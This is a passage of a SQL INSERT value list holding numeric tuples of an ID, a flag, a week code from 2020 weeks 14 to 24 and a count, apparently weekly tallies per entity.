),(1774,1,'202014',2),(1780,1,'202014',2),(2154,1,'202014',2),(2178,1,'202014',2),(2297,1,'202014',2),(2748,1,'202014',2),(2809,1,'202014',2),(2911,1,'202014',2),(3038,1,'202014',2),(472,1,'202014',3),(473,1,'202014',3),(474,1,'202014',3),(476,1,'202014',3),(478,1,'202014',3),(481,1,'202014',3),(1594,1,'202014',3),(1596,1,'202014',3),(1707,1,'202014',3),(1709,1,'202014',3),(1711,1,'202014',3),(1715,1,'202014',3),(1720,1,'202014',3),(1722,1,'202014',3),(1739,1,'202014',3),(1745,1,'202014',3),(1772,1,'202014',3),(1776,1,'202014',3),(2165,1,'202014',3),(2252,1,'202014',3),(2293,1,'202014',3),(2457,1,'202014',3),(2558,1,'202014',3),(2617,1,'202014',3),(2704,1,'202014',3),(2751,1,'202014',3),(2964,1,'202014',3),(3004,1,'202014',3),(3006,1,'202014',3),(3023,1,'202014',3),(467,1,'202014',4),(471,1,'202014',4),(477,1,'202014',4),(479,1,'202014',4),(1590,1,'202014',4),(1592,1,'202014',4),(1604,1,'202014',4),(1608,1,'202014',4),(1610,1,'202014',4),(1695,1,'202014',4),(1701,1,'202014',4),(1703,1,'202014',4),(1705,1,'202014',4),(1724,1,'202014',4),(1737,1,'202014',4),(1749,1,'202014',4),(1766,1,'202014',4),(1778,1,'202014',4),(2150,1,'202014',4),(2152,1,'202014',4),(2156,1,'202014',4),(2161,1,'202014',4),(2658,1,'202014',4),(2956,1,'202014',4),(2965,1,'202014',4),(2991,1,'202014',4),(2993,1,'202014',4),(3005,1,'202014',4),(3041,1,'202014',4),(469,1,'202014',5),(470,1,'202014',5),(1586,1,'202014',5),(1598,1,'202014',5),(1606,1,'202014',5),(1612,1,'202014',5),(1768,1,'202014',5),(2063,1,'202014',5),(2148,1,'202014',5),(2296,1,'202014',5),(2775,1,'202014',5),(2804,1,'202014',5),(2989,1,'202014',5),(3027,1,'202014',5),(3030,1,'202014',5),(3034,1,'202014',5),(1699,1,'202014',6),(1713,1,'202014',6),(1730,1,'202014',6),(2159,1,'202014',6),(2248,1,'202014',6),(2609,1,'202014',6),(1582,1,'202014',7),(1614,1,'202014',7),(1697,1,'202014',7),(2769,1,'202014',7),(2801,1,'202014',7),(2813,1,'202014',7),(3045,1,'202014',7),(1600,1,'202014',8),(1588,1,'202014',9),(2309,1,'202014',12),(471,1,'202015',1),(478,1,'202015',1),(481,1,'202015',1),(1701,1,'202015',1),(2161,1,'202015',1),(3006,1,'202015',1),(467,1,'202015',2),(469,1,'202015',2),(472,1,'202015',2),(476,1,'202015',2),(477,1,'202015',2),(479,1,'202015',2),(480,1,'202015',2),(482,1,'202015',2),(483,1,'202015',2),(1594,1,'202015',2),(1598,1,'202015',2),(1602,1,'202015',2),(1610,1,'202015',2),(1697,1,'202015',2),(1713,1,'202015',2),(1720,1,'202015',2),(1732,1,'202015',2),(1751,1,'202015',2),(1768,1,'202015',2),(1776,1,'202015',2),(1778,1,'202015',2),(1780,1,'202015',2),(2248,1,'202015',2),(2252,1,'202015',2),(2296,1,'202015',2),(2617,1,'202015',2),(2658,1,'202015',2),(2775,1,'202015',2),(2804,1,'202015',2),(2911,1,'202015',2),(2964,1,'202015',2),(3004,1,'202015',2),(470,1,'202015',3),(474,1,'202015',3),(484,1,'202015',3),(485,1,'202015',3),(486,1,'202015',3),(487,1,'202015',3),(570,1,'202015',3),(1584,1,'202015',3),(1586,1,'202015',3),(1596,1,'202015',3),(1612,1,'202015',3),(1695,1,'202015',3),(1705,1,'202015',3),(1707,1,'202015',3),(1709,1,'202015',3),(1711,1,'202015',3),(1715,1,'202015',3),(1718,1,'202015',3),(1737,1,'202015',3),(1739,1,'202015',3),(1745,1,'202015',3),(1747,1,'202015',3),(1749,1,'202015',3),(1766,1,'202015',3),(2159,1,'202015',3),(2293,1,'202015',3),(2558,1,'202015',3),(2748,1,'202015',3),(2989,1,'202015',3),(2991,1,'202015',3),(3005,1,'202015',3),(3023,1,'202015',3),(468,1,'202015',4),(488,1,'202015',4),(1582,1,'202015',4),(1590,1,'202015',4),(1608,1,'202015',4),(1699,1,'202015',4),(1724,1,'202015',4),(1726,1,'202015',4),(1734,1,'202015',4),(1743,1,'202015',4),(1770,1,'202015',4),(1772,1,'202015',4),(1774,1,'202015',4),(2063,1,'202015',4),(2148,1,'202015',4),(2150,1,'202015',4),(2154,1,'202015',4),(2156,1,'202015',4),(2165,1,'202015',4),(2297,1,'202015',4),(2965,1,'202015',4),(2993,1,'202015',4),(3027,1,'202015',4),(3038,1,'202015',4),(3041,1,'202015',4),(473,1,'202015',5),(1544,1,'202015',5),(1592,1,'202015',5),(1614,1,'202015',5),(1728,1,'202015',5),(2152,1,'202015',5),(2704,1,'202015',5),(3030,1,'202015',5),(1606,1,'202015',6),(1703,1,'202015',6),(1722,1,'202015',6),(1741,1,'202015',6),(1782,1,'202015',6),(2457,1,'202015',6),(2956,1,'202015',6),(2178,1,'202015',7),(2751,1,'202015',7),(2813,1,'202015',7),(3034,1,'202015',7),(2801,1,'202015',8),(2809,1,'202015',8),(3045,1,'202015',8),(1604,1,'202015',9),(2769,1,'202015',9),(1588,1,'202015',12),(1730,1,'202015',15),(2309,1,'202015',16),(1600,1,'202015',17),(2609,1,'202015',19),(469,1,'202016',1),(476,1,'202016',1),(477,1,'202016',1),(478,1,'202016',1),(1544,1,'202016',1),(1590,1,'202016',1),(1596,1,'202016',1),(1602,1,'202016',1),(1614,1,'202016',1),(1711,1,'202016',1),(1724,1,'202016',1),(1780,1,'202016',1),(1782,1,'202016',1),(2063,1,'202016',1),(2150,1,'202016',1),(2165,1,'202016',1),(2296,1,'202016',1),(2804,1,'202016',1),(2965,1,'202016',1),(3004,1,'202016',1),(3005,1,'202016',1),(3006,1,'202016',1),(479,1,'202016',2),(481,1,'202016',2),(482,1,'202016',2),(488,1,'202016',2),(1584,1,'202016',2),(1592,1,'202016',2),(1598,1,'202016',2),(1608,1,'202016',2),(1703,1,'202016',2),(1709,1,'202016',2),(1715,1,'202016',2),(1741,1,'202016',2),(1749,1,'202016',2),(1766,1,'202016',2),(1768,1,'202016',2),(1772,1,'202016',2),(1774,1,'202016',2),(1776,1,'202016',2),(2148,1,'202016',2),(2154,1,'202016',2),(2159,1,'202016',2),(2161,1,'202016',2),(2558,1,'202016',2),(2704,1,'202016',2),(2748,1,'202016',2),(2775,1,'202016',2),(2964,1,'202016',2),(3023,1,'202016',2),(3041,1,'202016',2),(467,1,'202016',3),(468,1,'202016',3),(471,1,'202016',3),(480,1,'202016',3),(484,1,'202016',3),(486,1,'202016',3),(1586,1,'202016',3),(1606,1,'202016',3),(1610,1,'202016',3),(1699,1,'202016',3),(1707,1,'202016',3),(1720,1,'202016',3),(1722,1,'202016',3),(1739,1,'202016',3),(1778,1,'202016',3),(2156,1,'202016',3),(2293,1,'202016',3),(2297,1,'202016',3),(2658,1,'202016',3),(2801,1,'202016',3),(2809,1,'202016',3),(3034,1,'202016',3),(470,1,'202016',4),(474,1,'202016',4),(483,1,'202016',4),(485,1,'202016',4),(1604,1,'202016',4),(1612,1,'202016',4),(1701,1,'202016',4),(1728,1,'202016',4),(1770,1,'202016',4),(2152,1,'202016',4),(2751,1,'202016',4),(2813,1,'202016',4),(2956,1,'202016',4),(2991,1,'202016',4),(2993,1,'202016',4),(3027,1,'202016',4),(487,1,'202016',5),(570,1,'202016',5),(1718,1,'202016',5),(1745,1,'202016',5),(1747,1,'202016',5),(1751,1,'202016',5),(2178,1,'202016',5),(2248,1,'202016',5),(2617,1,'202016',5),(2989,1,'202016',5),(3030,1,'202016',5),(473,1,'202016',6),(1594,1,'202016',6),(1732,1,'202016',6),(1737,1,'202016',6),(2252,1,'202016',6),(2457,1,'202016',6),(2911,1,'202016',7),(1730,1,'202016',8),(3038,1,'202016',9),(3045,1,'202016',9),(1600,1,'202016',10),(2769,1,'202016',11),(1588,1,'202016',12),(2309,1,'202016',12),(2609,1,'202016',12),(468,1,'202017',1),(472,1,'202017',1),(476,1,'202017',1),(477,1,'202017',1),(1544,1,'202017',1),(1594,1,'202017',1),(1612,1,'202017',1),(1703,1,'202017',1),(1711,1,'202017',1),(1739,1,'202017',1),(2617,1,'202017',1),(2704,1,'202017',1),(2748,1,'202017',1),(2809,1,'202017',1),(470,1,'202017',2),(474,1,'202017',2),(488,1,'202017',2),(1584,1,'202017',2),(1602,1,'202017',2),(1608,1,'202017',2),(1697,1,'202017',2),(1699,1,'202017',2),(1705,1,'202017',2),(1713,1,'202017',2),(1724,1,'202017',2),(1732,1,'202017',2),(1734,1,'202017',2),(1745,1,'202017',2),(1766,1,'202017',2),(1770,1,'202017',2),(1774,1,'202017',2),(1782,1,'202017',2),(2148,1,'202017',2),(2161,1,'202017',2),(2248,1,'202017',2),(2293,1,'202017',2),(2558,1,'202017',2),(2775,1,'202017',2),(2965,1,'202017',2),(2991,1,'202017',2),(3004,1,'202017',2),(3041,1,'202017',2),(467,1,'202017',3),(469,1,'202017',3),(473,1,'202017',3),(480,1,'202017',3),(481,1,'202017',3),(483,1,'202017',3),(487,1,'202017',3),(570,1,'202017',3),(1586,1,'202017',3),(1592,1,'202017',3),(1598,1,'202017',3),(1610,1,'202017',3),(1695,1,'202017',3),(1701,1,'202017',3),(1709,1,'202017',3),(1718,1,'202017',3),(1720,1,'202017',3),(1722,1,'202017',3),(1772,1,'202017',3),(2150,1,'202017',3),(2159,1,'202017',3),(2165,1,'202017',3),(2296,1,'202017',3),(2804,1,'202017',3),(2964,1,'202017',3),(2989,1,'202017',3),(3023,1,'202017',3),(3038,1,'202017',3),(479,1,'202017',4),(484,1,'202017',4),(1582,1,'202017',4),(1590,1,'202017',4),(1596,1,'202017',4),(1715,1,'202017',4),(1728,1,'202017',4),(1737,1,'202017',4),(1741,1,'202017',4),(1743,1,'202017',4),(1747,1,'202017',4),(1751,1,'202017',4),(1778,1,'202017',4),(1780,1,'202017',4),(2152,1,'202017',4),(2154,1,'202017',4),(2178,1,'202017',4),(2252,1,'202017',4),(2658,1,'202017',4),(3005,1,'202017',4),(3034,1,'202017',4),(3045,1,'202017',4),(482,1,'202017',5),(485,1,'202017',5),(1604,1,'202017',5),(1606,1,'202017',5),(1614,1,'202017',5),(1707,1,'202017',5),(1726,1,'202017',5),(1730,1,'202017',5),(2156,1,'202017',5),(2457,1,'202017',5),(2751,1,'202017',5),(2769,1,'202017',5),(2911,1,'202017',5),(3030,1,'202017',5),(1749,1,'202017',6),(1768,1,'202017',6),(1776,1,'202017',6),(2063,1,'202017',6),(2813,1,'202017',6),(486,1,'202017',7),(2297,1,'202017',7),(2993,1,'202017',7),(3027,1,'202017',9),(2801,1,'202017',10),(2956,1,'202017',10),(2309,1,'202017',11),(2609,1,'202017',13),(1600,1,'202017',23),(1588,1,'202017',31),(470,1,'202018',1),(471,1,'202018',1),(473,1,'202018',1),(474,1,'202018',1),(478,1,'202018',1),(485,1,'202018',1),(1582,1,'202018',1),(1586,1,'202018',1),(1590,1,'202018',1),(1608,1,'202018',1),(1610,1,'202018',1),(1612,1,'202018',1),(1614,1,'202018',1),(1695,1,'202018',1),(1697,1,'202018',1),(1699,1,'202018',1),(1707,1,'202018',1),(1713,1,'202018',1),(1718,1,'202018',1),(1732,1,'202018',1),(1745,1,'202018',1),(1768,1,'202018',1),(1772,1,'202018',1),(2150,1,'202018',1),(2296,1,'202018',1),(2558,1,'202018',1),(2748,1,'202018',1),(2769,1,'202018',1),(2991,1,'202018',1),(3023,1,'202018',1),(467,1,'202018',2),(469,1,'202018',2),(479,1,'202018',2),(480,1,'202018',2),(481,1,'202018',2),(484,1,'202018',2),(487,1,'202018',2),(488,1,'202018',2),(1584,1,'202018',2),(1594,1,'202018',2),(1596,1,'202018',2),(1602,1,'202018',2),(1703,1,'202018',2),(1715,1,'202018',2),(1728,1,'202018',2),(1741,1,'202018',2),(1743,1,'202018',2),(1749,1,'202018',2),(1766,1,'202018',2),(1778,1,'202018',2),(2063,1,'202018',2),(2152,1,'202018',2),(2156,1,'202018',2),(2161,1,'202018',2),(2178,1,'202018',2),(2804,1,'202018',2),(2956,1,'202018',2),(2989,1,'202018',2),(3006,1,'202018',2),(3027,1,'202018',2),(472,1,'202018',3),(1604,1,'202018',3),(1606,1,'202018',3),(1711,1,'202018',3),(1720,1,'202018',3),(1737,1,'202018',3),(1747,1,'202018',3),(1751,1,'202018',3),(1776,1,'202018',3),(1780,1,'202018',3),(2154,1,'202018',3),(2159,1,'202018',3),(2165,1,'202018',3),(2248,1,'202018',3),(2293,1,'202018',3),(2617,1,'202018',3),(2658,1,'202018',3),(2704,1,'202018',3),(2775,1,'202018',3),(2911,1,'202018',3),(2964,1,'202018',3),(2965,1,'202018',3),(3038,1,'202018',3),(3041,1,'202018',3),(468,1,'202018',4),(476,1,'202018',4),(486,1,'202018',4),(1592,1,'202018',4),(1598,1,'202018',4),(1770,1,'202018',4),(1782,1,'202018',4),(2148,1,'202018',4),(2252,1,'202018',4),(2809,1,'202018',4),(2813,1,'202018',4),(3004,1,'202018',4),(3034,1,'202018',4),(3045,1,'202018',4),(482,1,'202018',5),(1701,1,'202018',5),(1709,1,'202018',5),(1726,1,'202018',5),(1739,1,'202018',5),(2457,1,'202018',5),(2993,1,'202018',5),(1774,1,'202018',6),(2297,1,'202018',6),(2309,1,'202018',6),(2751,1,'202018',6),(3005,1,'202018',6),(570,1,'202018',7),(1730,1,'202018',7),(2609,1,'202018',8),(2801,1,'202018',8),(3030,1,'202018',8),(1722,1,'202018',9),(1588,1,'202018',10),(1600,1,'202018',19),(481,1,'202019',2),(1590,1,'202019',2),(1715,1,'202019',2),(2148,1,'202019',2),(2293,1,'202019',2),(2558,1,'202019',2),(467,1,'202019',3),(468,1,'202019',3),(472,1,'202019',3),(473,1,'202019',3),(482,1,'202019',3),(484,1,'202019',3),(485,1,'202019',3),(487,1,'202019',3),(488,1,'202019',3),(1584,1,'202019',3),(1592,1,'202019',3),(1596,1,'202019',3),(1606,1,'202019',3),(1608,1,'202019',3),(1612,1,'202019',3),(1614,1,'202019',3),(1695,1,'202019',3),(1697,1,'202019',3),(1703,1,'202019',3),(1709,1,'202019',3),(1711,1,'202019',3),(1713,1,'202019',3),(1726,1,'202019',3),(1728,1,'202019',3),(1732,1,'202019',3),(1739,1,'202019',3),(1743,1,'202019',3),(1749,1,'202019',3),(1770,1,'202019',3),(1780,1,'202019',3),(1782,1,'202019',3),(2156,1,'202019',3),(2159,1,'202019',3),(2161,1,'202019',3),(2165,1,'202019',3),(2178,1,'202019',3),(2297,1,'202019',3),(2617,1,'202019',3),(2704,1,'202019',3),(2748,1,'202019',3),(2813,1,'202019',3),(2964,1,'202019',3),(3005,1,'202019',3),(3027,1,'202019',3),(3045,1,'202019',3),(470,1,'202019',4),(471,1,'202019',4),(478,1,'202019',4),(479,1,'202019',4),(483,1,'202019',4),(1604,1,'202019',4),(1610,1,'202019',4),(1699,1,'202019',4),(1701,1,'202019',4),(1705,1,'202019',4),(1707,1,'202019',4),(1722,1,'202019',4),(1724,1,'202019',4),(1730,1,'202019',4),(1766,1,'202019',4),(1768,1,'202019',4),(1772,1,'202019',4),(1774,1,'202019',4),(1778,1,'202019',4),(2152,1,'202019',4),(2252,1,'202019',4),(2296,1,'202019',4),(2775,1,'202019',4),(2809,1,'202019',4),(2911,1,'202019',4),(2965,1,'202019',4),(2989,1,'202019',4),(2991,1,'202019',4),(2993,1,'202019',4),(3004,1,'202019',4),(3006,1,'202019',4),(3034,1,'202019',4),(474,1,'202019',5),(476,1,'202019',5),(480,1,'202019',5),(486,1,'202019',5),(570,1,'202019',5),(1544,1,'202019',5),(1586,1,'202019',5),(1594,1,'202019',5),(1598,1,'202019',5),(1602,1,'202019',5),(1734,1,'202019',5),(1737,1,'202019',5),(1741,1,'202019',5),(1747,1,'202019',5),(1751,1,'202019',5),(2063,1,'202019',5),(2150,1,'202019',5),(2248,1,'202019',5),(2801,1,'202019',5),(3023,1,'202019',5),(469,1,'202019',6),(1720,1,'202019',6),(1745,1,'202019',6),(1776,1,'202019',6),(2309,1,'202019',6),(2457,1,'202019',6),(2609,1,'202019',6),(2658,1,'202019',6),(2769,1,'202019',6),(477,1,'202019',7),(1588,1,'202019',7),(1718,1,'202019',7),(2751,1,'202019',7),(2804,1,'202019',7),(3041,1,'202019',7),(2956,1,'202019',10),(1600,1,'202019',11),(2154,1,'202019',12),(3030,1,'202019',12),(3038,1,'202019',13),(1582,1,'202019',15),(484,1,'202020',1),(1711,1,'202020',1),(1718,1,'202020',1),(1720,1,'202020',1),(1734,1,'202020',1),(1739,1,'202020',1),(1766,1,'202020',1),(1770,1,'202020',1),(1782,1,'202020',1),(2154,1,'202020',1),(2165,1,'202020',1),(2252,1,'202020',1),(2296,1,'202020',1),(2558,1,'202020',1),(2617,1,'202020',1),(2748,1,'202020',1),(469,1,'202020',2),(471,1,'202020',2),(472,1,'202020',2),(476,1,'202020',2),(477,1,'202020',2),(478,1,'202020',2),(479,1,'202020',2),(482,1,'202020',2),(483,1,'202020',2),(485,1,'202020',2),(1544,1,'202020',2),(1590,1,'202020',2),(1594,1,'202020',2),(1596,1,'202020',2),(1602,1,'202020',2),(1608,1,'202020',2),(1695,1,'202020',2),(1705,1,'202020',2),(1722,1,'202020',2),(1724,1,'202020',2),(1737,1,'202020',2),(1745,1,'202020',2),(1747,1,'202020',2),(1749,1,'202020',2),(1751,1,'202020',2),(1772,1,'202020',2),(1774,1,'202020',2),(2150,1,'202020',2),(2152,1,'202020',2),(2156,1,'202020',2),(2248,1,'202020',2),(2293,1,'202020',2),(2809,1,'202020',2),(3005,1,'202020',2),(3027,1,'202020',2),(467,1,'202020',3),(480,1,'202020',3),(481,1,'202020',3),(570,1,'202020',3),(1582,1,'202020',3),(1610,1,'202020',3),(1699,1,'202020',3),(1701,1,'202020',3),(1707,1,'202020',3),(1709,1,'202020',3),(1715,1,'202020',3),(1728,1,'202020',3),(1732,1,'202020',3),(1743,1,'202020',3),(1768,1,'202020',3),(1776,1,'202020',3),(2161,1,'202020',3),(2178,1,'202020',3),(2457,1,'202020',3),(2769,1,'202020',3),(2775,1,'202020',3),(2911,1,'202020',3),(2964,1,'202020',3),(2965,1,'202020',3),(3006,1,'202020',3),(3041,1,'202020',3),(488,1,'202020',4),(1584,1,'202020',4),(1598,1,'202020',4),(1612,1,'202020',4),(1614,1,'202020',4),(1697,1,'202020',4),(1703,1,'202020',4),(1726,1,'202020',4),(1778,1,'202020',4),(1780,1,'202020',4),(2063,1,'202020',4),(2658,1,'202020',4),(2704,1,'202020',4),(2813,1,'202020',4),(2956,1,'202020',4),(2989,1,'202020',4),(3004,1,'202020',4),(3023,1,'202020',4),(3030,1,'202020',4),(3038,1,'202020',4),(468,1,'202020',5),(1586,1,'202020',5),(2297,1,'202020',5),(2609,1,'202020',5),(2804,1,'202020',5),(2991,1,'202020',5),(2993,1,'202020',5),(3034,1,'202020',5),(470,1,'202020',6),(474,1,'202020',6),(487,1,'202020',6),(1588,1,'202020',6),(1592,1,'202020',6),(1604,1,'202020',6),(1606,1,'202020',6),(1713,1,'202020',6),(1741,1,'202020',6),(2148,1,'202020',6),(2309,1,'202020',6),(486,1,'202020',7),(1730,1,'202020',7),(2159,1,'202020',8),(2801,1,'202020',8),(473,1,'202020',10),(2751,1,'202020',10),(3045,1,'202020',10),(1600,1,'202020',29),(468,1,'202021',1),(470,1,'202021',1),(477,1,'202021',1),(478,1,'202021',1),(479,1,'202021',1),(480,1,'202021',1),(481,1,'202021',1),(484,1,'202021',1),(1586,1,'202021',1),(1590,1,'202021',1),(1598,1,'202021',1),(1602,1,'202021',1),(1610,1,'202021',1),(1705,1,'202021',1),(1743,1,'202021',1),(1768,1,'202021',1),(2148,1,'202021',1),(2150,1,'202021',1),(2159,1,'202021',1),(2804,1,'202021',1),(2964,1,'202021',1),(3005,1,'202021',1),(3023,1,'202021',1),(469,1,'202021',2),(471,1,'202021',2),(472,1,'202021',2),(1544,1,'202021',2),(1594,1,'202021',2),(1699,1,'202021',2),(1707,1,'202021',2),(1711,1,'202021',2),(1715,1,'202021',2),(1724,1,'202021',2),(1739,1,'202021',2),(1747,1,'202021',2),(1751,1,'202021',2),(1770,1,'202021',2),(1778,1,'202021',2),(2063,1,'202021',2),(2156,1,'202021',2),(2161,1,'202021',2),(2248,1,'202021',2),(2252,1,'202021',2),(2297,1,'202021',2),(2658,1,'202021',2),(2769,1,'202021',2),(2775,1,'202021',2),(2989,1,'202021',2),(2993,1,'202021',2),(3004,1,'202021',2),(3006,1,'202021',2),(3030,1,'202021',2),(3034,1,'202021',2),(3041,1,'202021',2),(3045,1,'202021',2),(1608,1,'202021',3),(1614,1,'202021',3),(1697,1,'202021',3),(1732,1,'202021',3),(1734,1,'202021',3),(1737,1,'202021',3),(1745,1,'202021',3),(1774,1,'202021',3),(1782,1,'202021',3),(2152,1,'202021',3),(2296,1,'202021',3),(2457,1,'202021',3),(2617,1,'202021',3),(2809,1,'202021',3),(2813,1,'202021',3),(2991,1,'202021',3),(3027,1,'202021',3),(473,1,'202021',4),(474,1,'202021',4),(483,1,'202021',4),(485,1,'202021',4),(570,1,'202021',4),(1612,1,'202021',4),(1703,1,'202021',4),(1720,1,'202021',4),(1749,1,'202021',4),(1766,1,'202021',4),(2178,1,'202021',4),(2293,1,'202021',4),(2558,1,'202021',4),(2911,1,'202021',4),(2956,1,'202021',4),(3038,1,'202021',4),(486,1,'202021',5),(1582,1,'202021',5),(1588,1,'202021',5),(1604,1,'202021',5),(1606,1,'202021',5),(1718,1,'202021',5),(1728,1,'202021',5),(1730,1,'202021',5),(2165,1,'202021',5),(2748,1,'202021',5),(2751,1,'202021',5),(2801,1,'202021',5),(2965,1,'202021',5),(1592,1,'202021',6),(1741,1,'202021',6),(1772,1,'202021',6),(487,1,'202021',7),(2154,1,'202021',7),(2309,1,'202021',7),(2609,1,'202021',7),(1600,1,'202021',9),(1722,1,'202021',9),(472,1,'202022',2),(479,1,'202022',2),(1612,1,'202022',2),(1697,1,'202022',2),(1715,1,'202022',2),(1720,1,'202022',2),(1739,1,'202022',2),(1749,1,'202022',2),(1766,1,'202022',2),(1770,1,'202022',2),(2156,1,'202022',2),(2296,1,'202022',2),(2297,1,'202022',2),(2658,1,'202022',2),(2965,1,'202022',2),(3030,1,'202022',2),(3038,1,'202022',2),(468,1,'202022',3),(469,1,'202022',3),(474,1,'202022',3),(476,1,'202022',3),(480,1,'202022',3),(482,1,'202022',3),(483,1,'202022',3),(485,1,'202022',3),(1582,1,'202022',3),(1586,1,'202022',3),(1590,1,'202022',3),(1602,1,'202022',3),(1703,1,'202022',3),(1705,1,'202022',3),(1707,1,'202022',3),(1709,1,'202022',3),(1711,1,'202022',3),(1713,1,'202022',3),(1718,1,'202022',3),(1726,1,'202022',3),(1728,1,'202022',3),(1737,1,'202022',3),(1745,1,'202022',3),(1768,1,'202022',3),(1776,1,'202022',3),(2154,1,'202022',3),(2704,1,'202022',3),(2748,1,'202022',3),(2989,1,'202022',3),(2991,1,'202022',3),(2993,1,'202022',3),(3023,1,'202022',3),(3027,1,'202022',3),(471,1,'202022',4),(473,1,'202022',4),(477,1,'202022',4),(481,1,'202022',4),(488,1,'202022',4),(570,1,'202022',4),(1584,1,'202022',4),(1592,1,'202022',4),(1606,1,'202022',4),(1699,1,'202022',4),(1722,1,'202022',4),(1724,1,'202022',4),(1732,1,'202022',4),(1741,1,'202022',4),(1747,1,'202022',4),(1751,1,'202022',4),(1774,1,'202022',4),(1778,1,'202022',4),(1780,1,'202022',4),(1782,1,'202022',4),(2063,1,'202022',4),(2148,1,'202022',4),(2150,1,'202022',4),(2152,1,'202022',4),(2161,1,'202022',4),(2165,1,'202022',4),(2178,1,'202022',4),(2252,1,'202022',4),(2558,1,'202022',4),(2617,1,'202022',4),(2809,1,'202022',4),(2911,1,'202022',4),(3004,1,'202022',4),(3045,1,'202022',4),(467,1,'202022',5),(470,1,'202022',5),(478,1,'202022',5),(486,1,'202022',5),(1596,1,'202022',5),(1608,1,'202022',5),(1614,1,'202022',5),(1743,1,'202022',5),(1772,1,'202022',5),(2775,1,'202022',5),(2964,1,'202022',5),(3005,1,'202022',5),(3041,1,'202022',5),(484,1,'202022',6),(487,1,'202022',6),(1594,1,'202022',6),(1598,1,'202022',6),(1610,1,'202022',6),(1701,1,'202022',6),(2159,1,'202022',6),(2248,1,'202022',6),(2804,1,'202022',6),(1604,1,'202022',7),(1730,1,'202022',7),(2751,1,'202022',7),(2769,1,'202022',7),(2956,1,'202022',7),(3034,1,'202022',7),(1695,1,'202022',8),(3006,1,'202022',8),(1544,1,'202022',9),(2457,1,'202022',9),(2813,1,'202022',9),(1734,1,'202022',10),(2801,1,'202022',11),(2609,1,'202022',12),(1600,1,'202022',16),(1588,1,'202022',19),(2309,1,'202022',22),(472,1,'202023',1),(483,1,'202023',1),(1715,1,'202023',1),(1776,1,'202023',1),(2804,1,'202023',1),(3023,1,'202023',1),(471,1,'202023',2),(476,1,'202023',2),(1610,1,'202023',2),(1711,1,'202023',2),(1722,1,'202023',2),(1737,1,'202023',2),(1772,1,'202023',2),(2159,1,'202023',2),(2252,1,'202023',2),(2617,1,'202023',2),(2658,1,'202023',2),(2956,1,'202023',2),(2964,1,'202023',2),(3005,1,'202023',2),(467,1,'202023',3),(473,1,'202023',3),(478,1,'202023',3),(482,1,'202023',3),(485,1,'202023',3),(487,1,'202023',3),(1584,1,'202023',3),(1592,1,'202023',3),(1701,1,'202023',3),(1703,1,'202023',3),(1709,1,'202023',3),(1718,1,'202023',3),(1739,1,'202023',3),(1745,1,'202023',3),(1747,1,'202023',3),(1751,1,'202023',3),(1770,1,'202023',3),(1774,1,'202023',3),(1778,1,'202023',3),(1780,1,'202023',3),(2150,1,'202023',3),(2165,1,'202023',3),(2558,1,'202023',3),(2704,1,'202023',3),(2809,1,'202023',3),(2965,1,'202023',3),(3027,1,'202023',3),(470,1,'202023',4),(479,1,'202023',4),(480,1,'202023',4),(488,1,'202023',4),(570,1,'202023',4),(1586,1,'202023',4),(1590,1,'202023',4),(1606,1,'202023',4),(1608,1,'202023',4),(1612,1,'202023',4),(1699,1,'202023',4),(1707,1,'202023',4),(1720,1,'202023',4),(1724,1,'202023',4),(1728,1,'202023',4),(1732,1,'202023',4),(1766,1,'202023',4),(1782,1,'202023',4),(2063,1,'202023',4),(2152,1,'202023',4),(2178,1,'202023',4),(2248,1,'202023',4),(2296,1,'202023',4),(2748,1,'202023',4),(3004,1,'202023',4),(3006,1,'202023',4),(3030,1,'202023',4),(3038,1,'202023',4),(3063,1,'202023',4),(469,1,'202023',5),(477,1,'202023',5),(481,1,'202023',5),(1544,1,'202023',5),(1602,1,'202023',5),(1604,1,'202023',5),(1614,1,'202023',5),(1695,1,'202023',5),(1697,1,'202023',5),(1705,1,'202023',5),(1713,1,'202023',5),(1730,1,'202023',5),(1749,1,'202023',5),(2148,1,'202023',5),(2156,1,'202023',5),(2775,1,'202023',5),(2801,1,'202023',5),(2911,1,'202023',5),(2989,1,'202023',5),(468,1,'202023',6),(484,1,'202023',6),(1582,1,'202023',6),(1594,1,'202023',6),(1596,1,'202023',6),(1726,1,'202023',6),(1743,1,'202023',6),(1768,1,'202023',6),(2154,1,'202023',6),(2161,1,'202023',6),(2293,1,'202023',6),(2751,1,'202023',6),(2991,1,'202023',6),(3041,1,'202023',6),(3045,1,'202023',6),(3060,1,'202023',6),(474,1,'202023',7),(486,1,'202023',7),(1734,1,'202023',7),(1741,1,'202023',7),(2993,1,'202023',7),(1598,1,'202023',8),(2457,1,'202023',8),(2297,1,'202023',9),(2769,1,'202023',11),(2813,1,'202023',11),(3034,1,'202023',13),(1600,1,'202023',15),(2309,1,'202023',19),(2609,1,'202023',22),(1588,1,'202023',24),(467,1,'202024',1),(471,1,'202024',1),(476,1,'202024',1),(478,1,'202024',1),(484,1,'202024',1),(488,1,'202024',1),(1596,1,'202024',1),(1598,1,'202024',1),(1612,1,'202024',1),(1697,1,'202024',1),(1709,1,'202024',1),(1713,1,'202024',1),(1732,1,'202024',1),(1770,1,'202024',1),(1778,1,'202024',1),(1782,1,'202024',1),(2152,1,'202024',1),(2156,1,'202024',1),(2161,1,'202024',1),(2248,1,'202024',1),(2293,1,'202024',1),(2558,1,'202024',1),(2617,1,'202024',1),(2748,1,'202024',1),(2809,1,'202024',1),(2965,1,'202024',1),(469,1,'202024',2),(470,1,'202024',2),(479,1,'202024',2),(481,1,'202024',2),(485,1,'202024',2),(1544,1,'202024',2),(1584,1,'202024',2),(1590,1,'202024',2),(1592,1,'202024',2),(1594,1,'202024',2),(1608,1,'202024',2),(1699,1,'202024',2),(1701,1,'202024',2),(1705,1,'202024',2),(1707,1,'202024',2),(1711,1,'202024',2),(1724,1,'202024',2),(1726,1,'202024',2),(1739,1,'202024',2),(1749,1,'202024',2),(1768,1,'202024',2),(1772,1,'202024',2),(1776,1,'202024',2),(1780,1,'202024',2),(2148,1,'202024',2),(2154,1,'202024',2),(2159,1,'202024',2),(2165,1,'202024',2),(2178,1,'202024',2),(2296,1,'202024',2),(2775,1,'202024',2),(2804,1,'202024',2),(2964,1,'202024',2),(2989,1,'202024',2),(3004,1,'202024',2),(3041,1,'202024',2),(468,1,'202024',3),(473,1,'202024',3),(477,1,'202024',3),(482,1,'202024',3),(1695,1,'202024',3),(1703,1,'202024',3),(1728,1,'202024',3),(1751,1,'202024',3),(1766,1,'202024',3),(2063,1,'202024',3),(2150,1,'202024',3),(2252,1,'202024',3),(2704,1,'202024',3),(2769,1,'202024',3),(2801,1,'202024',3),(2991,1,'202024',3),(2993,1,'202024',3),(3038,1,'202024',3),(472,1,'202024',4),(474,1,'202024',4),(487,1,'202024',4),(15